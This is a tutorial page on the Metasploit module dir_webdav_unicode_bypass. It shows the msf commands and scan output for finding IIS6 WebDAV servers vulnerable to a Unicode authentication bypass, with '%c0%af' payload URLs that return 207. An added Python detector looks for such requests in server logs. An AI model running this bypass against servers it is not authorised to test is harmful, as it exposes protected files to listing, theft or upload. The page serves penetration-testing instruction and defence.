Http/dir webdav unicode bypass
From www.metasploit-es.com.ar
The "dir_webdav_unicode_bypass" module scans a range of web servers and attempts to bypass authentication using the IIS6 WebDAV Unicode vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1535).
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(dir_webdav_unicode_bypass) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   DICTIONARY  /opt/metasploit3/msf3/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   ERROR_CODE  404                                            yes       Error code for non existent directory
   HTTP404S    /opt/metasploit3/msf3/data/wmap/wmap_404s.txt  no        Path of 404 signatures to use
   PATH        /                                              yes       The path to identify files
   Proxies                                                    no        Use a proxy chain
   RHOSTS                                                     yes       The target address range or CIDR identifier
   RPORT       80                                             yes       The target port
   THREADS     1                                              yes       The number of concurrent threads
   VHOST                                                      no        HTTP server virtual host
We will keep the default DICTIONARY and HTTP404S settings, set our RHOSTS and THREADS values, and run the module.
msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(dir_webdav_unicode_bypass) > set THREADS 20
THREADS => 20
msf auxiliary(dir_webdav_unicode_bypass) > run

[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Found protected folder http://192.168.1.211:80/admin/ 401 (192.168.1.211)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/phpmyadmin/ 401 (192.168.1.223)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/security/ 401 (192.168.1.223)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.204:80/printers/ 401 (192.168.1.204)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found vulnerable WebDAV Unicode bypass target http://192.168.1.204:80/%c0%afprinters/ 207 (192.168.1.204)
[*] Found protected folder http://192.168.1.203:80/printers/ 401 (192.168.1.203)
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found vulnerable WebDAV Unicode bypass target http://192.168.1.203:80/%c0%afprinters/ 207 (192.168.1.203)
...snip...
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_webdav_unicode_bypass) >
Our scan has found vulnerable servers. This vulnerability can potentially allow us to list, download, or even upload files to password-protected directories.
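On the defensive side, the pattern visible in the scan output above (a 401 on a folder, then a 207 on the same folder prefixed with %c0%af) can be searched for in web server logs. The following is an added example, not part of the original page or of Metasploit; it generalizes from %c0%af to any overlong two-byte sequence. It assumes W3C-style logs that keep the raw percent-encoded path, and the sample log lines and client addresses are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Lead bytes C0/C1 are never valid UTF-8: they occur only in overlong
# two-byte encodings of ASCII characters (e.g. %c0%af for "/").
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)

# Constructed sample in W3C extended format (assumption: raw path is logged).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2009-06-01 10:00:01 198.51.100.7 GET /printers/ 401
2009-06-01 10:00:02 198.51.100.7 PROPFIND /%c0%afprinters/ 207
2009-06-01 10:00:03 198.51.100.9 PROPFIND /%C0%AFadmin/ 401
2009-06-01 10:00:04 198.51.100.8 GET /index.html 200
""".splitlines()

def normalize(path):
    """Decode the path, mapping overlong pairs to the ASCII byte they encode."""
    raw = unquote_to_bytes(path)
    fixed = re.sub(rb"[\xc0\xc1][\x80-\xbf]",
                   lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]),
                   raw)
    return re.sub(r"/{2,}", "/", fixed.decode("latin-1"))

def find_bypass_attempts(log_lines):
    """Return (client, method, raw_path, normalized_path, status, verdict)."""
    fields, denied, findings = [], set(), []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        client, path, status = rec["c-ip"], rec["cs-uri-stem"], rec["sc-status"]
        target = normalize(path)
        if status == "401":
            denied.add((client, target.lower()))  # remember protected folders
        if OVERLONG.search(path):
            if status in ("200", "207"):          # request was served
                seen = (client, target.lower()) in denied
                verdict = "bypass-after-401" if seen else "bypass-suspected"
            else:
                verdict = "attempt"
            findings.append((client, rec["cs-method"], path, target, status, verdict))
    return findings

if __name__ == "__main__":
    for finding in find_bypass_attempts(SAMPLE_LOG):
        print(finding)
```

A "bypass-after-401" verdict means the same client was refused the normalized folder earlier and then served it through the overlong form, which is the highest-confidence case to triage first.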
© Offensive Security 2009
Original from www.offensive-security.com. Translated by cbk999